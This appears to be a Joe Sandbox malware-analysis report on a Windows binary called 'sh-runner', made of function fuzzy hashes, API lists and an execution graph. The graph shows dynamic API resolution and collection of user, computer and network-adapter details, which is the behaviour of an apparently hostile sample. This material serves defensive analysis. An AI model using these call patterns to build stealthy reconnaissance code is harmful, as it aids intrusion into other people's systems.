                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: fprintf
                                                                      • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                      • API String ID: 383729395-2468659920
                                                                      • Opcode ID: 214d4933b2e71066d62eb04ac44e51b8fbdefb7d7834033a0a8b7dae9f3bc6b3
                                                                      • Instruction ID: c9ddeacd3ca8467f42cef4aeb9c2a84f53b775904445e8b31997f1e3e8be7564
                                                                      • Opcode Fuzzy Hash: 214d4933b2e71066d62eb04ac44e51b8fbdefb7d7834033a0a8b7dae9f3bc6b3
                                                                      • Instruction Fuzzy Hash: 60F01252D08E8882D2069F2CA8011ABB321FB5D799F545335EE8D2A525DF28E5828710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID:
                                                                      • API String ID: 3510742995-0
                                                                      • Opcode ID: a882803c6373b8140cb1acc5120529d81f49224bc1023e90e7337d7bf7ab2a11
                                                                      • Instruction ID: 4f6060ce67292374603811ed2cb25559b9d47573565d688bd0acb05ad360e44e
                                                                      • Opcode Fuzzy Hash: a882803c6373b8140cb1acc5120529d81f49224bc1023e90e7337d7bf7ab2a11
                                                                      • Instruction Fuzzy Hash: 97B1CE62A04B8185E740DF69E8003AD77A4F708FE8F448635DEAD17B99DF38D891D364
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2153058950-0
                                                                      • Opcode ID: 7cf7448aaedaa62c266b382c2fa0f3af08e02c37161cf059a5816205767e74f0
                                                                      • Instruction ID: 55e4216391699c5b3415901bb3e3d85d9a12405f15879aa5e5309daf80412456
                                                                      • Opcode Fuzzy Hash: 7cf7448aaedaa62c266b382c2fa0f3af08e02c37161cf059a5816205767e74f0
                                                                      • Instruction Fuzzy Hash: 1171E872615B4182FB19AF2AA9403E9A760FB48BC4F945035DF8D07BA2DF3DE1D68710
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD0E14E), ref: 00007FF72BD28582
                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD0E14E), ref: 00007FF72BD285E3
                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD0E14E), ref: 00007FF72BD285F3
                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF72BD0E14E), ref: 00007FF72BD28642
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: f17577e6f870213ef3aa3de7ce3b1ecbdfc094bf71b1c554ff7e80671c820440
                                                                      • Instruction ID: 7c1e145d1e910904aa2f169eba97e90557ad4e99a5b51cf632adeb74ffa66d4a
                                                                      • Opcode Fuzzy Hash: f17577e6f870213ef3aa3de7ce3b1ecbdfc094bf71b1c554ff7e80671c820440
                                                                      • Instruction Fuzzy Hash: 8E317E22E4959242EE5D7B199E003F8A6A0EF88B81FC84435DE0D477E7DE2DB8514B60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 4f9c0e8cf95e065e47eaac6043f039f9923d9f226e81e56263bbb65d041ed7a4
                                                                      • Instruction ID: b5b4623054aa60ba4a2d3cad5da89df5c50e4aef70cc4a01fc411ab92b271965
                                                                      • Opcode Fuzzy Hash: 4f9c0e8cf95e065e47eaac6043f039f9923d9f226e81e56263bbb65d041ed7a4
                                                                      • Instruction Fuzzy Hash: 65318D22F5D99242FA5D7A5DAD003F9D6A0EF88B80FC84435DE0D477E6DE2DB8418B60
                                                                      APIs
                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0E14E,?,?,?,?,?,?,00007FF72BD0E7E9), ref: 00007FF72BD28492
                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0E14E,?,?,?,?,?,?,00007FF72BD0E7E9), ref: 00007FF72BD284B6
                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0E14E,?,?,?,?,?,?,00007FF72BD0E7E9), ref: 00007FF72BD28509
                                                                      • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,00007FF72BD0E14E,?,?,?,?,?,?,00007FF72BD0E7E9), ref: 00007FF72BD28516
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: d2c9f6836f61cd172c0b7c231a5a6352162b93bc84975687d09b25aa2e3d189c
                                                                      • Instruction ID: 1554d3c5ffca1f04c66b031685f073c842d1c0f2a45b97e828ef7f146746a037
                                                                      • Opcode Fuzzy Hash: d2c9f6836f61cd172c0b7c231a5a6352162b93bc84975687d09b25aa2e3d189c
                                                                      • Instruction Fuzzy Hash: D621B011F0D5D246FE5E7A296D003F9D991EF49B90FC84435DE4D477A2EE2EB8424B20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 34d87e71e1d26ee6304a37aee2e64596fe59a58b1bbfbbbe2566885a5bd73867
                                                                      • Instruction ID: 58f610c6f7bbf635906bca7014ad6aeea3886fed1f5083a6203ce081383b40ac
                                                                      • Opcode Fuzzy Hash: 34d87e71e1d26ee6304a37aee2e64596fe59a58b1bbfbbbe2566885a5bd73867
                                                                      • Instruction Fuzzy Hash: 44218E21F4999247FA5D3A1D9E003F9D291EF48B90FD84435DE4D477A2DE3EB8814B60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: defbf50bacf0bd71fc855c0fe0aae662a69bb2d39f6492e28cdf4ead743cc2a7
                                                                      • Instruction ID: 51e743625738c4d5c51e38aa02e2d1d51b76981da5628dc66cc0966a15516792
                                                                      • Opcode Fuzzy Hash: defbf50bacf0bd71fc855c0fe0aae662a69bb2d39f6492e28cdf4ead743cc2a7
                                                                      • Instruction Fuzzy Hash: 7BF04412A4884283E639BA1EF8453B99260EB4D794F845035DB9D425F18F3CE4C2C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: 58c5dfcd8be37af0757fe94257b284d1559d3cc6d61e1888325f7b31be4c0e03
                                                                      • Instruction ID: d9d18131e642478be87a301a0f712563c382d292a9d6d85189d49e2da081270d
                                                                      • Opcode Fuzzy Hash: 58c5dfcd8be37af0757fe94257b284d1559d3cc6d61e1888325f7b31be4c0e03
                                                                      • Instruction Fuzzy Hash: 30F0302264494185EA69BF2EEC41BF85360EB8DF9CF981135DE4C466A5DF3DE8C2CB10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$abort$CaptureContextUnwind
                                                                      • String ID:
                                                                      • API String ID: 2434310364-0
                                                                      • Opcode ID: f533ec74d414918267225ba9c748fb77645763afc5ea37744425af6202ba7a08
                                                                      • Instruction ID: 898041d65bc38aa0f2c2a847adf0f01ef914c467f6af5d50723f9116e8e6cb9f
                                                                      • Opcode Fuzzy Hash: f533ec74d414918267225ba9c748fb77645763afc5ea37744425af6202ba7a08
                                                                      • Instruction Fuzzy Hash: 81E0BF21A4845306E80DFA6A6C123FC8650EF4FF80FC59834EC6E177A3CD2D25424B25
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$abort$CaptureContextUnwind
                                                                      • String ID:
                                                                      • API String ID: 2434310364-0
                                                                      • Opcode ID: 35518d0840023c7934166721ae7b16f5a9fb2bcdc1a3a5e3fbe5953f01b984ae
                                                                      • Instruction ID: 56d946c9ad6ce3240ae45180b0afd279dd07157f652b853a5300fabda707b92c
                                                                      • Opcode Fuzzy Hash: 35518d0840023c7934166721ae7b16f5a9fb2bcdc1a3a5e3fbe5953f01b984ae
                                                                      • Instruction Fuzzy Hash: 32E0BF20A4845306E80CFA6A6C113FC8650EF8FF80FC4A834DC6E177A3CD2D25425A25

                                                                      Execution Graph

                                                                      Execution Coverage:6.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:741
                                                                      Total number of Limit Nodes:37
                                                                      execution_graph 6201 112cf6c1b40 6202 112cf6c1b73 6201->6202 6230 112cf6c1d9e 6202->6230 6231 112cf6bd510 6202->6231 6205 112cf6bd510 LdrGetProcedureAddress 6206 112cf6c1c5a 6205->6206 6207 112cf6bd510 LdrGetProcedureAddress 6206->6207 6208 112cf6c1c75 6207->6208 6209 112cf6bd510 LdrGetProcedureAddress 6208->6209 6210 112cf6c1c90 6209->6210 6211 112cf6bd510 LdrGetProcedureAddress 6210->6211 6212 112cf6c1cab 6211->6212 6213 112cf6bd510 LdrGetProcedureAddress 6212->6213 6214 112cf6c1cc6 6213->6214 6215 112cf6bd510 LdrGetProcedureAddress 6214->6215 6216 112cf6c1ce1 6215->6216 6217 112cf6bd510 LdrGetProcedureAddress 6216->6217 6218 112cf6c1cfc 6217->6218 6219 112cf6bd510 LdrGetProcedureAddress 6218->6219 6220 112cf6c1d17 6219->6220 6221 112cf6bd510 LdrGetProcedureAddress 6220->6221 6222 112cf6c1d32 6221->6222 6223 112cf6bd510 LdrGetProcedureAddress 6222->6223 6224 112cf6c1d4d 6223->6224 6225 112cf6bd510 LdrGetProcedureAddress 6224->6225 6226 112cf6c1d68 6225->6226 6227 112cf6bd510 LdrGetProcedureAddress 6226->6227 6228 112cf6c1d83 6227->6228 6229 112cf6bd510 LdrGetProcedureAddress 6228->6229 6229->6230 6232 112cf6bd540 6231->6232 6234 112cf6bd546 6231->6234 6233 112cf6bd617 LdrGetProcedureAddress 6232->6233 6232->6234 6233->6234 6234->6205 6302 112cf6c0000 6303 112cf6c007b 6302->6303 6305 112cf6c00f6 6303->6305 6306 112cf6bab40 6303->6306 6307 112cf6bab9f 6306->6307 6309 112cf6bab74 6306->6309 6307->6309 6310 112cf6b9660 6307->6310 6309->6305 6311 112cf6b969c 6310->6311 6312 112cf6c2df0 NtAddBootEntry 6311->6312 6313 112cf6b9794 6311->6313 6312->6313 6313->6309 6314 112cf6c0d00 6315 112cf6c0d33 6314->6315 6316 112cf6c0e17 6315->6316 6317 112cf6bd510 LdrGetProcedureAddress 6315->6317 6317->6316 6422 112cf6c10c0 6423 112cf6c10f3 6422->6423 6424 112cf6c127d 6423->6424 6425 112cf6bd510 LdrGetProcedureAddress 6423->6425 6426 112cf6c11db 6425->6426 6427 112cf6bd510 LdrGetProcedureAddress 6426->6427 6428 112cf6c11f6 6427->6428 6429 112cf6bd510 LdrGetProcedureAddress 6428->6429 6430 112cf6c1211 6429->6430 6431 112cf6bd510 LdrGetProcedureAddress 6430->6431 6432 112cf6c122c 6431->6432 6433 112cf6bd510 LdrGetProcedureAddress 6432->6433 6434 112cf6c1247 6433->6434 6435 112cf6bd510 LdrGetProcedureAddress 6434->6435 6436 112cf6c1262 6435->6436 6437 112cf6bd510 LdrGetProcedureAddress 6436->6437 6437->6424 6787 112cf6c0f80 6789 112cf6c0fb3 6787->6789 6788 112cf6c1096 6789->6788 6790 112cf6bd510 LdrGetProcedureAddress 6789->6790 6791 112cf6c107b 6790->6791 6792 112cf6bd510 LdrGetProcedureAddress 6791->6792 6792->6788 6793 112cf6c1780 6795 112cf6c17b3 6793->6795 6794 112cf6c18cc 6795->6794 6796 112cf6bd510 LdrGetProcedureAddress 6795->6796 6797 112cf6c187b 6796->6797 6798 112cf6bd510 LdrGetProcedureAddress 6797->6798 6799 112cf6c1896 6798->6799 6800 112cf6bd510 LdrGetProcedureAddress 6799->6800 6801 112cf6c18b1 6800->6801 6802 112cf6bd510 LdrGetProcedureAddress 6801->6802 6802->6794 6318 112cf6b2400 6319 112cf6b240e 6318->6319 6322 112cf6b7d70 6319->6322 6321 112cf6b241f 6323 112cf6b7da1 6322->6323 6324 112cf6b7f52 GetUserNameA 6323->6324 6331 112cf6b7f70 6324->6331 6325 112cf6b7ff3 GetComputerNameExA 6326 112cf6b805b 6325->6326 6327 112cf6b8016 6325->6327 6328 112cf6b809e GetAdaptersInfo 6326->6328 6327->6326 6330 112cf6b8034 GetComputerNameExA 6327->6330 6329 112cf6b80bc 6328->6329 6333 112cf6b80f1 6328->6333 6332 112cf6b80da GetAdaptersInfo 6329->6332 6329->6333 6330->6326 6331->6325 6332->6333 6334 112cf6b0cc0 NtAddBootEntry 6333->6334 6335 112cf6b81ae 6334->6335 6335->6321 6438 112cf6bdbc0 6439 112cf6bdc3c 6438->6439 6441 112cf6bdc5a 6439->6441 6445 112cf6c5ee0 6439->6445 6442 112cf6bdc80 6441->6442 6443 112cf6c3830 NtAddBootEntry 6441->6443 6444 112cf6bfc80 NtAddBootEntry 6441->6444 6443->6441 6444->6441 6446 112cf6c5f19 6445->6446 6450 112cf6c5f73 6445->6450 6447 112cf6c4050 NtAddBootEntry 6446->6447 6446->6450 6448 112cf6c5f45 6447->6448 6449 112cf6c4050 NtAddBootEntry 6448->6449 6448->6450 6449->6450 6450->6441 6803 112cf6b2080 6804 112cf6b2253 6803->6804 6805 112cf6b20af 6803->6805 6809 112cf6b8c20 6805->6809 6807 112cf6b2228 6807->6804 6815 112cf6b8820 6807->6815 6810 112cf6b8c88 6809->6810 6813 112cf6b8cef 6809->6813 6810->6813 6819 112cf6b11f0 6810->6819 6812 112cf6b8da0 6812->6813 6822 112cf6c0a40 6812->6822 6813->6807 6816 112cf6b8836 6815->6816 6817 112cf6c48a0 NtAddBootEntry 6816->6817 6818 112cf6b8bab 6816->6818 6817->6818 6818->6804 6826 112cf6c0e40 6819->6826 6823 112cf6c0a64 6822->6823 6824 112cf6c0b10 6823->6824 6825 112cf6bd510 LdrGetProcedureAddress 6823->6825 6824->6813 6825->6824 6827 112cf6b1212 6826->6827 6828 112cf6c0e78 6826->6828 6827->6812 6828->6827 6829 112cf6bd510 LdrGetProcedureAddress 6828->6829 6829->6827 6830 112cf6bc180 6831 112cf6bc189 6830->6831 6833 112cf6bc18e 6831->6833 6834 112cf6bc1c0 6831->6834 6835 112cf6bc1d5 6834->6835 6837 112cf6bc1cd 6834->6837 6836 112cf6c2df0 NtAddBootEntry 6835->6836 6835->6837 6836->6837 6837->6833 6838 112cf6b1f80 6839 112cf6b1f93 6838->6839 6841 112cf6b1fb5 6838->6841 6839->6841 6842 112cf6b1730 6839->6842 6844 112cf6b1756 6842->6844 6846 112cf6b12b0 6844->6846 6845 112cf6b18f8 6845->6841 6847 112cf6b12d1 6846->6847 6849 112cf6b1336 6846->6849 6847->6849 6850 112cf6c39e0 6847->6850 6849->6845 6851 112cf6c3a65 6850->6851 6852 112cf6c3a0e 6850->6852 6851->6849 6852->6851 6853 112cf6c3a63 NtAddBootEntry 6852->6853 6853->6851 6854 112cf6b5174 6857 112cf6b5179 6854->6857 6855 112cf6c5ee0 NtAddBootEntry 6855->6857 6856 112cf6bfa90 NtAddBootEntry 6856->6857 6857->6855 6857->6856 6858 112cf6b534b 6857->6858 6859 112cf4c026e 6860 112cf4c028f 6859->6860 6861 112cf4c0366 9 API calls 6860->6861 6862 112cf4c029a 6861->6862 6147 112cf6c1ed0 6149 112cf6c1edc 6147->6149 6148 112cf6c1f94 6149->6148 6150 112cf6c1f0a 6149->6150 6151 112cf6c1f17 6149->6151 6150->6148 6156 112cf6c4eb0 6150->6156 6151->6148 6153 112cf6c1f4d CreateFiberEx 6151->6153 6153->6148 6154 112cf6c1f79 DeleteFiber 6153->6154 6154->6148 6157 112cf6c4ecd 6156->6157 6158 112cf6c3830 NtAddBootEntry 6157->6158 6159 112cf6c50dd 6157->6159 6158->6159 6159->6148 6336 112cf6c0610 6337 112cf6c0643 6336->6337 6338 112cf6c0a1f 6337->6338 6339 112cf6bd510 LdrGetProcedureAddress 6337->6339 6340 112cf6c072b 6339->6340 6341 112cf6bd510 LdrGetProcedureAddress 6340->6341 6342 112cf6c0746 6341->6342 6343 112cf6bd510 LdrGetProcedureAddress 6342->6343 6344 112cf6c0761 6343->6344 6345 112cf6bd510 LdrGetProcedureAddress 6344->6345 6346 112cf6c077c 6345->6346 6347 112cf6bd510 LdrGetProcedureAddress 6346->6347 6348 112cf6c0797 6347->6348 6349 112cf6bd510 LdrGetProcedureAddress 6348->6349 6350 112cf6c07b2 6349->6350 6351 112cf6bd510 LdrGetProcedureAddress 6350->6351 6352 112cf6c07cd 6351->6352 6353 112cf6bd510 LdrGetProcedureAddress 6352->6353 6354 112cf6c07e8 6353->6354 6355 112cf6bd510 LdrGetProcedureAddress 6354->6355 6356 112cf6c0803 6355->6356 6357 112cf6bd510 LdrGetProcedureAddress 6356->6357 6358 112cf6c081e 6357->6358 6359 112cf6bd510 LdrGetProcedureAddress 6358->6359 6360 112cf6c0839 6359->6360 6361 112cf6bd510 LdrGetProcedureAddress 6360->6361 6362 112cf6c0854 6361->6362 6363 112cf6bd510 LdrGetProcedureAddress 6362->6363 6364 112cf6c086f 6363->6364 6365 112cf6bd510 LdrGetProcedureAddress 6364->6365 6366 112cf6c088a 6365->6366 6367 112cf6bd510 LdrGetProcedureAddress 6366->6367 6368 112cf6c08a5 6367->6368 6369 112cf6bd510 LdrGetProcedureAddress 6368->6369 6370 112cf6c08c0 6369->6370 6371 112cf6bd510 LdrGetProcedureAddress 6370->6371 6372 112cf6c08db 6371->6372 6373 112cf6bd510 LdrGetProcedureAddress 6372->6373 6374 112cf6c08f6 6373->6374 6375 112cf6bd510 LdrGetProcedureAddress 6374->6375 6376 112cf6c0911 6375->6376 6377 112cf6bd510 LdrGetProcedureAddress 6376->6377 6378 112cf6c092c 6377->6378 6379 112cf6bd510 LdrGetProcedureAddress 6378->6379 6380 112cf6c0947 6379->6380 6381 112cf6bd510 LdrGetProcedureAddress 6380->6381 6382 112cf6c0962 6381->6382 6383 112cf6bd510 LdrGetProcedureAddress 6382->6383 6384 112cf6c097d 6383->6384 6385 112cf6bd510 LdrGetProcedureAddress 6384->6385 6386 112cf6c0998 6385->6386 6387 112cf6bd510 LdrGetProcedureAddress 6386->6387 6388 112cf6c09b3 6387->6388 6389 112cf6bd510 LdrGetProcedureAddress 6388->6389 6390 112cf6c09ce 6389->6390 6391 112cf6bd510 LdrGetProcedureAddress 6390->6391 6392 112cf6c09e9 6391->6392 6393 112cf6bd510 LdrGetProcedureAddress 6392->6393 6394 112cf6c0a04 6393->6394 6395 112cf6bd510 LdrGetProcedureAddress 6394->6395 6395->6338 6160 112cf6bd510 6161 112cf6bd540 